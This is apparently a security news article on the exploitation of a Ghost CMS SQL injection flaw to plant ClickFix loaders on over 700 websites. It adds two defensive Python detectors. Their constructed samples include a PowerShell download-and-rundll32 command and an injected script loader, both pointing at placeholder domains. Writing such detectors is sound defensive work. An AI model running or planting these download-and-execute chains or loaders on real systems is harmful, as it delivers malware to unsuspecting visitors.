Ghost CMS CVE-2026-26980 Exploited to Compromise Over 700 Websites in ClickFix Campaign
A critical security vulnerability in Ghost CMS has been exploited by threat actors to inject malicious JavaScript code, facilitating ClickFix attacks. This exploitation of CVE-2026-26980, which has a CVSS score of 9.4, underscores a significant risk for users of the platform.
Overview of the Vulnerability
CVE-2026-26980 is an SQL injection vulnerability within Ghost’s Content API that allows unauthenticated attackers to read arbitrary data from the database. Discovered by Anthropic using Claude, this flaw was addressed in February 2026 with the release of version 6.19.1. However, the window of opportunity for attackers has proven to be substantial, as evidenced by the ongoing exploitation.
The severity of this vulnerability lies in its ability to grant unauthorized access to a site’s admin API key. This access allows attackers to manipulate content within the CMS, including the injection of malicious code into published articles.
Scale of the Attack
According to QiAnXin XLab, the exploitation of this vulnerability has led to a large-scale poisoning campaign, affecting over 700 websites across various sectors, including universities, blockchain, artificial intelligence, and financial technology. The campaign was first detected on May 7, 2026, and is attributed to at least two distinct threat clusters. The rapid deployment of malicious code within a single day highlights the efficiency and coordination of these attackers.
The injected JavaScript code acts as a two-stage loader, retrieving the main payload from an external domain. This flexibility allows attackers to change the payloads while maintaining the loader’s functionality across multiple compromised sites.
Technical Mechanisms of the Attack
The malicious JavaScript code is designed to collect fingerprint information from users’ browsers and upload it to a remote server. This traffic distribution script is powered by Adspect, a commercial cloaking service that ensures only genuine victims are served the actual payload. Security scanners and crawlers are redirected to benign web pages, effectively masking the attack.
Victims are presented with a fake CAPTCHA verification page, which is part of the ClickFix attack strategy. This page instructs users to copy and paste a Base64-encoded command into the Windows Run dialog, triggering further malicious activities.
The command serves as a dropper, delivering a ZIP archive that contains a Windows batch script. This script executes a PowerShell command to download a DLL file from a remote domain, which is then launched using “rundll32.exe.” This diversion is designed to distract users while the attack unfolds.
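As an added defender-side example, not code from the original report or from the Ghost project, the following Python checks a command line as it would appear in a process-creation event or in the Explorer RunMRU history for the pattern just described: a Base64 blob that decodes to a PowerShell download step followed by a rundll32 launch. The two sample commands, the reserved `example.invalid` domain, the 40-character blob threshold and the indicator list are all constructed for this example; the decoder tries UTF-16LE first because that is the encoding PowerShell's -EncodedCommand switch expects.

```python
import base64
import re
from typing import Dict, List, Optional

# A run of at least 40 base64 characters with optional padding. The threshold
# is a choice made for this example: shorter runs are too often ordinary tokens.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Substrings that, taken together, match the chain the article describes:
# PowerShell fetching a file and rundll32 launching a DLL. Heuristic list
# chosen for this example, not a published signature.
SUSPICIOUS_TOKENS = (
    "powershell", "-encodedcommand", "invoke-webrequest", "downloadfile",
    "expand-archive", "rundll32", ".dll", ".bat",
)


def ascii_ratio(text: str) -> float:
    """Share of characters that are printable ASCII or ordinary whitespace."""
    if not text:
        return 0.0
    ok = sum(1 for c in text if 32 <= ord(c) < 127 or c in "\r\n\t")
    return ok / len(text)


def decode_blob(blob: str) -> Optional[str]:
    """Decode a base64 token to text, or return None if it is not text.

    UTF-16LE is tried first because PowerShell's -EncodedCommand expects it;
    UTF-8 covers plain 'base64' style encodings. The candidate with the higher
    ASCII ratio wins, which separates real text from the NUL-laced or
    CJK-looking output of decoding with the wrong charset.
    """
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    best, best_ratio = None, 0.0
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        ratio = ascii_ratio(text)
        if ratio > best_ratio:
            best, best_ratio = text, ratio
    return best if best_ratio >= 0.9 else None


def classify_command(command: str) -> Dict[str, object]:
    """Decode any base64 blobs in a command line and score the whole thing.

    'suspicious' requires a decodable blob plus at least two indicators, so a
    bare 'powershell' invocation or a long base64 string on its own does not
    trigger.
    """
    decoded: List[str] = []
    for blob in BASE64_RUN.findall(command):
        text = decode_blob(blob)
        if text:
            decoded.append(text)
    haystack = (command + " " + " ".join(decoded)).lower()
    indicators = [token for token in SUSPICIOUS_TOKENS if token in haystack]
    return {
        "decoded": decoded,
        "indicators": indicators,
        "suspicious": bool(decoded) and len(indicators) >= 2,
    }


# Constructed samples. The second is built at runtime so the plaintext stays
# readable; the .invalid domain is reserved and resolves nowhere.
SAMPLE_INNER = ("Invoke-WebRequest https://example.invalid/stage.zip -OutFile stage.zip; "
                "Expand-Archive stage.zip .; rundll32 stage.dll,Start")
SAMPLE_BENIGN = r"notepad.exe C:\Users\alice\notes.txt"
SAMPLE_CLICKFIX = "powershell -w hidden -EncodedCommand " + base64.b64encode(
    SAMPLE_INNER.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_CLICKFIX):
        result = classify_command(sample)
        print(result["suspicious"], result["indicators"])
```

The two-indicator rule is deliberate: requiring both a decodable blob and more than one chain-specific token keeps legitimate encoded PowerShell used by administration tooling from drowning the alert in noise, while the decoded text is returned so an analyst can read what the blob actually does.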
Implications for Users and Organizations
The implications of this vulnerability extend beyond immediate technical concerns. The compromise of legitimate websites increases the likelihood of successful ClickFix attacks, as users may trust these sites. Organizations using Ghost CMS are urged to take immediate action by upgrading to the latest version, rotating all credentials, and auditing access logs for any signs of suspicious activity.
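For the audit step, and for the two-stage loader described earlier, here is an added Python example (not the project's or the reporter's code) that scans the rendered HTML of each post for the two shapes an injected loader takes: a script tag pulling from a host outside your allowlist, or an inline script that builds and appends a second script element. The post HTML, slugs, allowlisted hosts and `*.invalid` domains are constructed for the example; in practice the HTML of each post would first be retrieved from Ghost's API, and the allowlist replaced with the hosts your theme really loads from.

```python
from html.parser import HTMLParser
from typing import Dict, Iterable, List, Tuple
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from. Constructed for this example.
ALLOWED_SCRIPT_HOSTS = {"example-blog.invalid", "cdn.example-blog.invalid"}

# Inline-script substrings typical of a loader that decodes a URL and appends
# a second script element. Heuristic list for this example, not a signature.
LOADER_HINTS = (
    "createelement('script')", 'createelement("script")',
    "atob(", "fromcharcode(", "appendchild(",
)


class ScriptAuditor(HTMLParser):
    """Collects off-allowlist <script src> values and loader-like inline scripts."""

    def __init__(self) -> None:
        super().__init__()
        self._in_script = False
        self._current_src = None
        self.external: List[str] = []
        self.inline: List[Dict[str, object]] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        self._current_src = dict(attrs).get("src")
        if self._current_src:
            # urlparse handles absolute and protocol-relative (//host/x.js)
            # sources; same-origin relative paths have no hostname and are skipped.
            host = urlparse(self._current_src).hostname
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.external.append(self._current_src)

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as data; only inline scripts
        # (no src attribute) are examined here.
        if self._in_script and not self._current_src:
            lowered = data.lower()
            hits = [hint for hint in LOADER_HINTS if hint in lowered]
            if hits:
                self.inline.append({"snippet": data.strip()[:80], "hints": hits})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self._current_src = None


def audit_posts(posts: Iterable[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per post whose HTML contains a suspicious script."""
    findings = []
    for slug, html in posts:
        auditor = ScriptAuditor()
        auditor.feed(html)
        auditor.close()
        if auditor.external or auditor.inline:
            findings.append({
                "slug": slug,
                "external_scripts": auditor.external,
                "inline_loaders": auditor.inline,
            })
    return findings


# Constructed post bodies: one clean, one with an inline decoder-and-append
# loader, one with a script tag fetching from an unlisted host.
SAMPLE_POSTS = [
    ("welcome",
     '<p>Hello</p><script src="https://cdn.example-blog.invalid/app.js"></script>'),
    ("quarterly-report",
     "<p>Q1 report</p><script>var s=document.createElement('script');"
     "s.src=atob('aHR0cHM6Ly9zdGFnZTIuaW52YWxpZA==');document.head.appendChild(s);</script>"),
    ("tips",
     '<p>Tips</p><script src="//stage1.invalid/loader.js" async></script>'),
]

if __name__ == "__main__":
    for finding in audit_posts(SAMPLE_POSTS):
        print(finding["slug"], finding["external_scripts"], finding["inline_loaders"])
```

Run against every published post after upgrading and rotating credentials, and keep the output: a post that was clean on day one and carries an off-allowlist script a week later is the signal that a key is still in the attacker's hands.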
Additionally, users who may have visited compromised sites should be notified of potential risks. The ongoing nature of the attacks emphasizes the need for vigilance and proactive security measures.
Conclusion
The exploitation of CVE-2026-26980 serves as a stark reminder of the vulnerabilities present in widely used content management systems. As threat actors continue to adapt and refine their techniques, organizations must remain vigilant and prioritize security to safeguard their digital assets.
For further details on this ongoing situation, refer to the original reporting source: thehackernews.com.